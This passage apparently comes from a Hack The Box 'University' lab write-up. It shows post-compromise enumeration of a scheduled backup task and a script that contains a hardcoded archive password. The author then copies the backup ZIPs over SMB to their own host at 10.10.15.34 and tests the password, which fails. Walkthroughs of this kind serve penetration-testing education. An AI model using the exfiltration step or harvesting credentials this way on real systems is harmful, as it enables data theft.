ScheduledTask
A scheduled task was discovered; \DB Backup
DB Backup
PS C:\Web\University> schtasks /QUERY /TN "\DB Backup" /V /FO LIST
Folder: \
HostName: DC
TaskName: \DB Backup
Next Run Time: 11/25/2024 5:19:27 PM
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 11/30/1999 12:00:00 AM
Last Result: 267011
Author: UNIVERSITY\Administrator
Task To Run: powershell -ExecutionPolicy ByPass -File "C:\Web\DB Backups\db-backup-automator.ps1"
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: WAO
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: Monthly
Start Time: 5:19:27 PM
Start Date: 1/16/2023
End Date: N/A
Days: 25
Months: Every month
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: DisabledC:\Web\DB Backups\db-backup-automator.ps1
C:\Web\DB Backups\db-backup-automator.ps1
PS C:\Web\University> cat "C:\Web\DB Backups\db-backup-automator.ps1"
$sourcePath = "C:\Web\University\db.sqlite3"
$destinationPath = "C:\Web\DB Backups\"
$7zExePath = "C:\Program Files\7-Zip\7z.exe"
$zipFileName = "DB-Backup-$(Get-Date -Format 'yyyy-MM-dd').zip"
$zipFilePath = Join-Path -Path $destinationPath -ChildPath $zipFileName
$7zCommand = "& `"$7zExePath`" a `"$zipFilePath`" `"$sourcePath`" -p'WebAO1337'"
Invoke-Expression -Command $7zCommandThe PowerShell script generates an archive of the C:\Web\University\db.sqlite3 file with a supplied password; WebAO1337
I will check for password reuse
Backup
PS C:\Web\University> ls "C:\Web\DB Backups\"
ls "C:\Web\DB Backups\"
Directory: C:\Web\DB Backups
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/25/2023 12:03 AM 24215 DB-Backup-2023-01-25.zip
-a---- 2/25/2023 12:03 AM 24215 DB-Backup-2023-02-25.zip
-a---- 3/25/2023 12:03 AM 24215 DB-Backup-2023-03-25.zip
-a---- 4/25/2023 12:04 AM 24215 DB-Backup-2023-04-25.zip
-a---- 5/25/2023 12:04 AM 24215 DB-Backup-2023-05-25.zip
-a---- 6/25/2023 12:04 AM 24215 DB-Backup-2023-06-25.zip
-a---- 7/25/2023 12:04 AM 24215 DB-Backup-2023-07-25.zip
-a---- 8/25/2023 12:04 AM 24215 DB-Backup-2023-08-25.zip
-a---- 9/25/2023 12:05 AM 24215 DB-Backup-2023-09-25.zip
-a---- 10/25/2023 12:05 AM 24215 DB-Backup-2023-10-25.zip
-a---- 11/25/2023 12:05 AM 24215 DB-Backup-2023-11-25.zip
-a---- 12/25/2023 12:05 AM 24215 DB-Backup-2023-12-25.zip
-a---- 1/25/2024 12:06 AM 24215 DB-Backup-2024-01-25.zip
-a---- 2/25/2024 12:06 AM 24215 DB-Backup-2024-02-25.zip
-a---- 3/25/2024 12:07 AM 24215 DB-Backup-2024-03-25.zip
-a---- 4/25/2024 12:07 AM 24215 DB-Backup-2024-04-25.zip
-a---- 10/14/2024 9:35 AM 386 db-backup-automator.ps1 The DB Backup directory contains a total of 16 ZIP archives
The loaded database has already been enumerated
Interestingly, they all have the same length.
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ mkdir DB\ Backups
PS C:\Web\DB Backups> copy *.zip "\\10.10.15.34\smb\DB Backups\"Transferring ZIP archives over SMB
┌──(kali㉿kali)-[~/…/htb/labs/university/DB Backups]
└─$ unzip DB-Backup-2023-01-25.zip
Archive: DB-Backup-2023-01-25.zip
[DB-Backup-2023-01-25.zip] db.sqlite3 password: WebAO1337
skipping: db.sqlite3 incorrect passwordWebAO1337 is not the password
I will check for password reuse